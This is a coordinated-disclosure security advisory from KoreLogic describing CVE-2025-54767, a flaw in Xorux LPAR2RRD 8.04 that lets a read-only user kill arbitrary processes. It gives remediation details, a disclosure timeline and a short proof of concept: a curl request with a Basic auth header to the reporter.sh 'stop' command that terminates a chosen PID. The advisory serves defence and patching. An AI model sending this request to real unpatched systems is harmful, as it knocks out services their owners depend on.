📄 Xorux LPAR2RRD 8.04 Denial of Service

KL-001-2025-014: Xorux LPAR2RRD Read Only User Denial of Service
    
    Title: Xorux LPAR2RRD Read Only User Denial of Service
    Advisory ID: KL-001-2025-014
    Publication Date: 2025-07-28
    Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2025-014.txt
    
    
    1. Vulnerability Details
    
         Affected Vendor: Xorux
         Affected Product: LPAR2RRD
         Affected Version: 8.04 and prior
         Platform: Rocky Linux 8.10
         CWE Classification: CWE-648: Incorrect Use of Privileged APIs
         CVE ID: CVE-2025-54767
    
    
    2. Vulnerability Description
    
         An authenticated, read-only user can kill any processes running
         on the Xormon Original virtual appliance as the lpar2rrd user.
    
    
    3. Technical Description
    
         The web application endpoint of
         https://<ip>/lpar2rrd-cgi/reporter.sh calls
         ../bin/reporter_cfg.pl, which contains a URL parameter command
         called "stop" which allows an attacker to specify a process ID
         (PID) to stop. The web application, running as the lpar2rrd
         user, then kills the process on the virtual appliance. This
         could be used to stop the webserver, the xormon.war web
         application or the lpar2rrd-daemon process, creating a denial
         of service (DoS) condition.
    
    
    4. Mitigation and Remediation Recommendation
    
         Xorux released version 8.05, which includes a remediation
         for this vulnerability. See https://lpar2rrd.com/note800.php.
    
    
    5. Credit
    
         This vulnerability was discovered by Jim Becher of KoreLogic,
         Inc.
    
    
    6. Disclosure Timeline
    
         2025-07-17 : KoreLogic requests point-of-contact to securely
                      report several vulnerabilities to Xorux.
         2025-07-18 : Vendor provides [email protected] as the
                      point-of-contact, noting that they do not use PGP.
         2025-07-21 : KoreLogic submits this vulnerability and four
                      additional discoveries to Xorux.
         2025-07-23 : Vendor acknowledges receipt, stating that the issue
                      has been remediated and a new version of the
                      affected product will be available 2025-07-25.
         2025-07-25 : Xorux publishes updated version of the affected
                      product.
         2025-07-28 : KoreLogic public disclosure.
    
    
    7. Proof of Concept
    
         On the Xormon Original virtual appliance:
    
             [lpar2rrd@xorux ~]$ ps -efww | grep lpar2rrd | grep bash
             lpar2rrd  185824  185823  0 May27 pts/0    00:00:00 -bash
             lpar2rrd 1777882  185824  0 13:40 pts/0    00:00:00 grep --color=auto bash
             [lpar2rrd@xorux ~]$
    
         From attacker box:
    
             attacker $ curl -k -H "Authorization: Basic amJlY2hlcjpqYmVjaGVy" 
    'https://172.31.255.207/lpar2rrd-cgi/reporter.sh?cmd=stop&pid=185824'
             {"status":"terminated"}
    
         On the Xormon Original virtual appliance:
    
             [lpar2rrd@xorux ~]$ Connection to 172.31.255.207 closed.
             attacker $
    
    
    The contents of this advisory are copyright(c) 2025
    KoreLogic, Inc. and are licensed under a Creative Commons
    Attribution Share-Alike 4.0 (United States) License:
    http://creativecommons.org/licenses/by-sa/4.0/
    
    KoreLogic, Inc. is a founder-owned and operated company with a
    proven track record of providing security services to entities
    ranging from Fortune 500 to small and mid-sized companies. We
    are a highly skilled team of senior security consultants doing
    by-hand security assessments for the most important networks in
    the U.S. and around the world. We are also developers of various
    tools and resources aimed at helping the security community.
    https://www.korelogic.com/about-korelogic.html
    
    Our public vulnerability disclosure policy is available at:
    https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy